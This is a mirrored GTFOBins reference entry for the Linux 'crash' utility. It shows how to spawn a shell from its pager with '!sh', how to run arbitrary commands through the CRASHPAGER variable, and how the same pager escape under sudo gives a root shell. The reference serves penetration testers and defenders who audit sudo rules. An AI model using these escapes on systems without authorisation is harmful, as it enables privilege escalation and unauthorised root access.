mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2024-11-08 07:49:17 +01:00
18 lines
475 B
Markdown
18 lines
475 B
Markdown
|
---
|
||
|
functions:
|
||
|
shell:
|
||
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||
|
code: |
|
||
|
crash -h
|
||
|
!sh
|
||
|
command:
|
||
|
- code: |
|
||
|
COMMAND='/usr/bin/id'
|
||
|
CRASHPAGER="$COMMAND" crash -h
|
||
|
sudo:
|
||
|
- description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||
|
code: |
|
||
|
sudo crash -h
|
||
|
!sh
|
||
|
---
|